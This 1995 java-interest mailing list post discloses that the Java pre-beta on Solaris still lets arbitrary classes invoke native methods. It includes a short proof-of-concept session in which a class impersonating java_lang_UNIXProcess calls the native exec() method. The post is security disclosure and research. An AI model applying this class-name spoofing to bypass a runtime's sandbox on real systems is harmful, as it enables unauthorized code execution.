[1853] in java-interest
native methods still insecure in Solaris pre-beta
daemon@ATHENA.MIT.EDU (sbk@netcom.com)
Mon Sep 18 20:31:37 1995
From: sbk@netcom.com
To: java-interest@java.sun.com
Date: Mon, 18 Sep 1995 08:04:37 -0700 (PDT)
Cc: sbk@netcom.com ()
The pre-beta version still has the native method hole. Any native
method can be invoked by arbitrary classes.
Reading an earlier response by one of the developers, it appears that
the protection method is implemented in the prebeta by prefixing the
mangled native method name with the length of its classname, which I
think can be circumvented.
-KB-
Script started on Mon Sep 18 07:44:11 1995
mizar: 1> cat java_lang_UNIXProcess.java
public final class java_lang_UNIXProcess
{
public native void exec();
public static void main(String argv[])
{
java_lang_UNIXProcess s = new java_lang_UNIXProcess();
s.exec();
}
}
mizar: 2> java_dk/java/bin/javac java_lang_UNIXProcess.java
mizar: 3> java_dk/java/bin/java java_lang_UNIXProcess
java.lang.IllegalArgumentException
at java_lang_UNIXProcess.main(java_lang_UNIXProcess.java:7)
mizar: 4> exit
script done on Mon Sep 18 07:45:09 1995
-
Note to Sun employees: this is an EXTERNAL mailing list!
Info: send 'help' to java-interest-request@java.sun.com
